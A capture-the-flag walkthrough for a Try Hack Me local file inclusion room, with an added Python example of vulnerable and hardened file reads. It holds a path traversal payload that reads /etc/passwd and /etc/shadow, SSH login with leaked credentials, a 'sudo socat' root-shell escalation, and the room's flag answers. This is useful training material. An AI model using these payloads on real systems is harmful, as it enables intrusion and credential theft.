Try Hack Me Local File Inclusion walkthrough
Try Hack Me
Title - inclusion
vulnerability - Local file inclusion
Flags - root.txt -
user.txt -
ip address - 10.10.62.75
Let's start >>>
# let's scan the target with nmap
nmap -sS -sC -sV 10.10.62.75
# port 22
# port 80
# let's open the web page on port 80 in the browser
http://10.10.62.75
# found articles on LFI & RFI
# we know that the vulnerability is LFI
# change the parameter in the URL > the URL looks like
10.10.62.75/article?name=lfi?article (now change the parameter and see)
10.10.62.75/article?name=../../../etc/passwd
# we got access to the /etc/passwd file
# this data leads to sensitive data exposure and RCE
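# added example (not part of the room or of this walkthrough's own code): the kind of file read that lets ?name=../../../etc/passwd work, next to a version that confines the parameter to the articles directory. The function names and the directory layout are assumptions made for the illustration.

```python
import tempfile
from pathlib import Path


def read_article_vulnerable(base: Path, name: str) -> str:
    # The bug pattern: the parameter is joined to a directory and opened as-is,
    # so "../" segments (or an absolute path) escape the articles directory.
    return (base / name).read_text()


def read_article_hardened(base: Path, name: str) -> str:
    # Resolve ".." and symlinks first, then require the result to stay under base.
    base = base.resolve()
    target = (base / name).resolve()
    if base not in target.parents or not target.is_file():
        raise PermissionError(f"rejected article name: {name!r}")
    return target.read_text()


def demo() -> dict:
    # Constructed layout: articles/ is the served directory, secret.txt stands
    # in for a sensitive file outside it (the role /etc/passwd plays above).
    with tempfile.TemporaryDirectory() as root:
        base = Path(root, "articles")
        base.mkdir()
        (base / "lfi").write_text("article about LFI")
        secret = Path(root, "secret.txt")
        secret.write_text("outside the web root")
        results = {"vulnerable": read_article_vulnerable(base, "../secret.txt")}
        cases = [("legit", "lfi"), ("traversal", "../secret.txt"), ("absolute", str(secret))]
        for label, name in cases:
            try:
                results[label] = read_article_hardened(base, name)
            except PermissionError:
                results[label] = "REJECTED"
        return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:10} -> {outcome}")
```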
# after analyzing the /etc/passwd file
# there are 2 users "root" & "falconfeast"
# after searching in the /etc/shadow file
# it uses the SHA-512 hashing algorithm; tried to crack the password hash but found nothing
# we don't have the password for "root"
# but in the /etc/passwd file we found "falconfeast:rootpassword"
user = falconfeast
pass = rootpassword
# now log in over SSH to find the flags
ssh falconfeast@10.10.62.75
ls
cat user.txt
flag user.txt = 60989655118397345799
# got 1st flag
# now it's time to escalate privileges to root (privilege escalation)
# with the sudo command we list this user's sudo entries
sudo -l
(root) NOPASSWD: /usr/bin/socat
# so let's search Google for what "socat" is
# there is a page called "gtfobins socat"
# on this page there are commands to execute as root
sudo socat stdin exec:/bin/sh
id
ls
cd /root
cat root.txt
flag root.txt = 42964104845495153909
# got 2nd flag
!!!!!!!!!!! here our task completes !!!!!!!!!!!!!!!